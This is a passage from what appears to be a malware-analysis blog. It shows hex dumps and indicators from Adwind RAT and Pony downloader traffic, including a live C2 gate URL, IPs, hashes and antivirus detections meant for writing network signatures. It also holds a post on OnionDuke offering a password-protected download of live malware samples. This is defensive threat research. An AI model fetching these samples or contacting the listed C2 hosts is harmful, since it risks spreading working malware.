<span style="font-family: Courier New, Courier, monospace;"><b><span style="background-color: #ea9999;">02 00</span><span style="background-color: white;"> </span></b><span style="background-color: white;"> - Is Serializable Flag - SC_SERIALIZABLE </span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b style="background-color: #ea9999;">78 70</b><span style="background-color: white;"> (xp) - some low-level information identifying serialized fields</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #fff2cc;"><b>1f 8b 08 00 00 00 00 00 00 00</b></span><span style="background-color: white;"> - GZIP header as seen in the serialization stream</span></span><br />
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<span style="background-color: white;"></span></blockquote>
<span style="background-color: white;">As you see, all Windows traffic captures have identical fields following the GZIP stream, while OSX traffic has different data. The jar files that had Pony Downloader payload did not have other OSX malware packaged and I saw no activity on OSX other than calling the C2 and writing to the randomly named timestamp file (</span>e.g VblVc5kEqY.tmp - updating current timestamp in Unix epoch format)<br />
<br />
Combination of the Stream Magic exchange, plus all other benign fields in this order will create a usable signature. However, it will be prone to false positives unless you use fields after the GZIP header for OS specific signatures<br />
<br />
Another signature can be based on the transfer. jar download as seen below<br />
<div>
<span style="background-color: white;"><br /></span></div>
<br />
<span style="background-color: white;"><b>DB46ADCFAE462E7C475C171FBE66DF82</b> - downloading </span>fab8de636d6f1ec93eeecaade8b9bc68<span style="background-color: white;"> </span><br />
iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) , which contains 15555.jar in Manifest.mf, which contains 15555.exe (Pony loader) in its' Manfest.mf<br />
<br />
IHEAKA _000C297 << IHEAKA is the name of the RAT client, it is different in each infection.<br />
<br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000000 <b>ac ed 00 05 </b> ....</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 00000000 ac ed 00 05 ....</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000004 77 04 w.</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">00000006 00 00 00 01 ....</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">0000000A 77 15 w.</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">0000000C 00 13 49 48 45 41 4b 41 5f 30 30 30 43 32 39 37 ..IHEAKA _000C297</span><br />
<span style="background-color: #f4cccc; font-family: Courier New, Courier, monospace;">0000001C 42 41 38 44 41 BA8DA</span><br />
<span style="font-family: Courier New, Courier, monospace;"> <span style="background-color: #cfe2f3;">00000004 77 0e 00 0c </span><b><u><span style="background-color: #9fc5e8;"><span style="color: red;">54 72 61 6e 73 66 65 72 2e 6a 61 72</span></span> </u></b><span style="background-color: #cfe2f3;">w...<b>Tran sfer.jar</b></span></span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 00000014 7a 00 00 04 00 50 4b 03 04 14 00 08 08 08 00 46 z....PK. .......F</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 00000024 0c 71 45 00 00 00 00 00 00 00 00 00 00 00 00 14 .qE..... ........</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 00000034 00 04 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 ...META- INF/MANI</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 00000044 46 45 53 54 2e 4d 46 fe ca 00 00 4d 8d 4d 0b c2 FEST.MF. ...M.M..</span><br />
<br />
---- snip----<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #cfe2f3;">000ABBA0 00 09 00 00 00 </span><span style="background-color: #9fc5e8;"><span style="color: red;"><u><b>31 35 35 35 35 2e 6a 61 72</b> 74 97</u></span></span></span><span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> .....<b>155 55.jar</b>t.</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 000ABBB0 43 70 26 8c a2 44 63 db 9c d8 b6 9d 7c b1 6d db Cp&..Dc. ....|.m.</span><br />
<span style="background-color: #cfe2f3; font-family: Courier New, Courier, monospace;"> 000ABBC0 c6 c4 b6 6d db b6 6d db 99 d8 76 f2 fe e5 dd bc ...m..m. ..v.....</span><br />
<br />
<span style="background-color: white;"></span>
<b><br /></b>
<b>Pony downloader traffic</b><br />
<br />
HTTP requests<br />
URL: http://meetngreetindia.com/scala/gate.php<br />
TYPE: POST<br />
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)<br />
URL: <span style="color: red;">http://meetngreetindia.com/scala/gate.php</span><br />
TYPE: GET<br />
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)<br />
DNS requests<br />
meetngreetindia.com (50.28.15.25)<br />
TCP connections<br />
50.28.15.25:80<br />
<br />
IP:<span class="Apple-tab-span" style="white-space: pre;"> </span>50.28.15.25<br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>840699673<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>mahanadi3.ewebguru.net<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>Liquid Web<br />
Organization:<span class="Apple-tab-span" style="white-space: pre;"> </span>eWebGuru<br />
State/Region:<span class="Apple-tab-span" style="white-space: pre;"> </span>Michigan<br />
City:<span class="Apple-tab-span" style="white-space: pre;"> </span>Lansing<br />
<br />
<a href="https://www.virustotal.com/en/ip-address/50.28.15.25/information/">https://www.virustotal.com/en/ip-address/50.28.15.25/information/</a><br />
<span style="color: #d9ead3;"><br /></span>
<br />
<div>
<span style="background-color: #d9ead3;"><br /></span>
<br />
<div>
<div style="font-size: 14px; line-height: 19px; text-align: center;">
<div style="text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: #d9ead3;">IP-Domain Information</span></span></div>
</div>
</div>
I<br />
<b>DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar </b><br />
<div>
<b>IP:<span class="Apple-tab-span" style="white-space: pre;"> </span>204.45.207.40</b><br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>3425554216<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>212.clients.instantdedis.com<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>FDCservers.net<br />
Country:<span class="Apple-tab-span" style="white-space: pre;"> </span>United States<br />
State/Region:<span class="Apple-tab-span" style="white-space: pre;"> </span>Colorado<br />
City:<span class="Apple-tab-span" style="white-space: pre;"> </span>Denver<br />
<b><br /></b></div>
<b>meetngreetindia.com (50.28.15.25)</b><br />
TCP connections<br />
50.28.15.25:80<br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>840699673<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>mahanadi3.ewebguru.net<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>Liquid Web<br />
Organization:<span class="Apple-tab-span" style="white-space: pre;"> </span>eWebGuru<br />
State/Region:<span class="Apple-tab-span" style="white-space: pre;"> </span>Michigan<br />
City:<span class="Apple-tab-span" style="white-space: pre;"> </span>Lansing<br />
<div>
<br /></div>
II<br />
<b>79E9DD35AEF6558461C4B93CD0C55B76 Purchase order.jar</b><br />
IP:<span class="Apple-tab-span" style="white-space: pre;"> </span><b>38.89.137.248</b><br />
Decimal:<span class="Apple-tab-span" style="white-space: pre;"> </span>643402232<br />
Hostname:<span class="Apple-tab-span" style="white-space: pre;"> </span>38.89.137.248<br />
ISP:<span class="Apple-tab-span" style="white-space: pre;"> </span>Cogent Communications<br />
Country:<span class="Apple-tab-span" style="white-space: pre;"> </span>United States us flag<br />
<br />
III<br />
<b>2856B11FF23D35DA2C9C906C61781BA Purchase order.jar</b><br />
<b><span style="color: red;">installone.no-ip.biz<span class="Apple-tab-span" style="white-space: pre;"> </span></span></b><br />
IP Address: <b>185.32.221.17</b><br />
Country: Switzerland<br />
Network Name: CH-DATASOURCE-20130812<br />
Owner Name: Datasource AG<br />
From IP: 185.32.220.0<br />
To IP: 185.32.223.255<br />
Allocated: Yes<br />
Contact Name: Rolf Tschumi<br />
Address: mgw online service, Roetihalde 12, CH-8820 Waedenswil<br />
Email: rolf.tschumi@mgw.ch<br />
Abuse Email: abuse@softplus.net<br />
<br />
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<div style="font-weight: bold;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div style="font-family: 'Times New Roman'; font-weight: normal;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div style="font-family: 'Times New Roman'; font-weight: normal;">
</div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div style="font-family: 'Times New Roman'; font-weight: normal;">
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: Courier New, Courier, monospace;"><span style="font-family: Courier New, Courier, monospace;"><b>Virustotal</b></span></span></div>
</div>
</div>
<span style="font-family: Courier New, Courier, monospace;">
</span></div>
<br />
<a href="https://www.virustotal.com/en/file/02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45/analysis/SHA256:">https://www.virustotal.com/en/file/02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45/analysis/SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span></a>02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45<br />
MD5 db46adcfae462e7c475c171fbe66df82<br />
SHA1 2b43211053d00147b2cb9847843911c771fd3db4<br />
SHA256 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45<br />
ssdeep3072:VR/6ZQvChcDfJNBOFJKMRXcCqfrCUMBpXOg84WoUeonNTFN:LdvCGJN0FJ1RXcgBpXOjOjSNTFN<br />
File size 128.1 KB ( 131178 bytes )<br />
File type ZIP<br />
Magic literalZip archive data, at least v2.0 to extract<br />
TrID<span class="Apple-tab-span" style="white-space: pre;"> </span>ZIP compressed archive (100.0%)<br />
File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>Payment Advice.jar<br />
Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>6 / 54<br />
Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-16 20:58:08 UTC ( 1 day, 4 hours ago )<br />
Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Java.Adwind<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
TrendMicro<span class="Apple-tab-span" style="white-space: pre;"> </span>JAVA_ADWIND.XXO<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
TrendMicro-HouseCall<span class="Apple-tab-span" style="white-space: pre;"> </span>JAVA_ADWIND.XXO<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
DrWeb<span class="Apple-tab-span" style="white-space: pre;"> </span>Java.Adwind.3<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>HEUR:Trojan.Java.Generic<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>a variant of Java/Adwind.T<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
<br /></div>
<a href="https://www.virustotal.com/en/file/733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c/analysis/1416194595/">https://www.virustotal.com/en/file/733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c/analysis/1416194595/</a><br />
SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c<br />
MD5 fab8de636d6f1ec93eeecaade8b9bc68<br />
File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>iWimMQLgpsT2624529381479181764.png<br />
Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>23 / 53<br />
Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-17 03:23:15 UTC ( 0 minutes ago )<br />
AVG<span class="Apple-tab-span" style="white-space: pre;"> </span>Zbot.URE<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
Qihoo-360<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32/Trojan.fff<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32/PSW.Fareit.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Fortinet<span class="Apple-tab-span" style="white-space: pre;"> </span>W32/Inject.SXVW!tr<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Antiy-AVL<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan[PSW]/Win32.Tepfer<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
AVware<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Generic!BT<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
DrWeb<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.PWS.Stealer.13319<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Symantec<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Maljava<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
McAfee<span class="Apple-tab-span" style="white-space: pre;"> </span>RDN/Generic Exploit!1m3<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
McAfee-GW-Edition<span class="Apple-tab-span" style="white-space: pre;"> </span>RDN/Generic Exploit!1m3<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Sophos<span class="Apple-tab-span" style="white-space: pre;"> </span>Mal/JavaJar-A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Avast<span class="Apple-tab-span" style="white-space: pre;"> </span>Java:Malware-gen [Trj]<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Cyren<span class="Apple-tab-span" style="white-space: pre;"> </span>Java/Agent.KS<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
F-Prot<span class="Apple-tab-span" style="white-space: pre;"> </span>Java/Agent.KS<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>HEUR:Trojan.Java.Generic<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Emsisoft<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557 (B)<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Ad-Aware<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
BitDefender<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
GData<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
MicroWorld-eScan<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Exploit.Java.Agent<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Norman<span class="Apple-tab-span" style="white-space: pre;"> </span>Adwind.E<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
<br />
<a href="https://www.virustotal.com/en/file/91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725/analysis/">https://www.virustotal.com/en/file/91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725/analysis/</a><br />
MD5 b5e7cd42b45f8670adaf96bbca5ae2d0<br />
SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725<br />
File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>asdqw4727319084772952101234.exe<br />
Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>12 / 54<br />
Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-17 03:21:30 UTC<br />
AVG<span class="Apple-tab-span" style="white-space: pre;"> </span>Zbot.URE<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
AVware<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Generic!BT<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Ad-Aware<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Antiy-AVL<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan[PSW]/Win32.Tepfer<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
BitDefender<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
DrWeb<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.PWS.Stealer.13319<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
ESET-NOD32<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32/PSW.Fareit.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Emsisoft<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557 (B)<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141116<br />
GData<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
MicroWorld-eScan<span class="Apple-tab-span" style="white-space: pre;"> </span>Gen:Variant.Kazy.494557<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117<br />
Qihoo-360<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32/Trojan.fff<span class="Apple-tab-span" style="white-space: pre;"> </span>20141117</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com2tag:blogger.com,1999:blog-7885177434994542510.post-1423842211468195362014-11-15T22:58:00.001-05:002016-02-26T01:14:15.252-05:00OnionDuke samples<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div>
<br /></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifgyyCkY3pKhXL4nD-s4Kt-xjMWIOfHjF-9liJeWOhCmd_lj7Vc2EIAYTIwDiKIdNaKka2rpX1jhk59gwN_xrs42IwKPhwyl1oJrptvvIA4ZN3iJVcWjK51EhW-Y0aTcoGBOhbKhYT4cc/s1600/infrastructure.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifgyyCkY3pKhXL4nD-s4Kt-xjMWIOfHjF-9liJeWOhCmd_lj7Vc2EIAYTIwDiKIdNaKka2rpX1jhk59gwN_xrs42IwKPhwyl1oJrptvvIA4ZN3iJVcWjK51EhW-Y0aTcoGBOhbKhYT4cc/s1600/infrastructure.png" width="200" /></a></div>
<div>
<a href="http://www.f-secure.com/weblog/archives/00002764.html">Research: F-Secure: OnionDuke: APT Attacks Via the Tor Network</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Download</b></span></div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<div style="line-height: 19px;">
<br />
<b><br /></b></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" imageanchor="1" style="clear: left; color: #660000; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; font-family: 'Courier New', Courier, monospace; padding: 0px; position: relative;" /></a><a href="https://www.dropbox.com/s/ml79ionelt0gocf/Onionduke.zip?dl=0">Download. Email me if you need the password</a> (new link)</div>
</div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<br /></div>
<div style="background-color: white;">
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>File attributes</b></span></div>
<div>
<div>
<br />
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px;">
Size: 219136</div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px;">
MD5: 28F96A57FA5FF663926E9BAD51A1D0CB</div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px;">
<br /></div>
<div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;">Size: 126464</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;">MD5: C8EB6040FD02D77660D19057A38FF769</span></span></div>
</div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;"><br /></span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;"></span></span><br />
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;">Size: 316928</span></span></div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19px;">
<div>
MD5: D1CE79089578DA2D41F1AD901F7B1014</div>
</span></span></div>
</div>
<a name='more'></a></div>
<div>
<br /></div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<br /></div>
<div>
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Virustotal info</b></span></div>
<div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<br /></div>
<div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Detection ratio:<span class="Apple-tab-span" style="white-space: pre;"> </span>8 / 52</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Analysis date:<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago ) </span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Antivirus</span><span class="Apple-tab-span" style="font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Result</span><span class="Apple-tab-span" style="font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6000003814697px; white-space: pre;"> </span><span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6000003814697px;">Update</span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Baidu-International<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Agent.adYf<span class="Apple-tab-span" style="white-space: pre;"> </span>20141107</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">F-Secure<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor:W32/OnionDuke.B<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Ikarus<span class="Apple-tab-span" style="white-space: pre;"> </span>Trojan.Win32.Agent<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Kaspersky<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Win32.MiniDuke.x<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Norman<span class="Apple-tab-span" style="white-space: pre;"> </span>OnionDuke.A<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Sophos<span class="Apple-tab-span" style="white-space: pre;"> </span>Troj/Ransom-ALA<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Symantec<span class="Apple-tab-span" style="white-space: pre;"> </span>Backdoor.Miniduke!gen4<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">Tencent<span class="Apple-tab-span" style="white-space: pre;"> </span>Win32.Trojan.Agent.Tbsl<span class="Apple-tab-span" style="white-space: pre;"> </span>20141115</span></span></div>
</div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;"><br /></span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 14px; line-height: 19.6000003814697px;">https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/</span></span></div>
<div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"></span><br />
<div style="font-size: 14px; line-height: 19.6000003814697px;">
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><br /></span></div>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;">
<div style="font-size: 14px; line-height: 19.6000003814697px;">
SHA256:<span class="Apple-tab-span" style="white-space: pre;"> </span>366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
File name:<span class="Apple-tab-span" style="white-space: pre;"> </span>366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b</div>
<div style="font-size: 14px; line-height: 19.6000003814697px;">
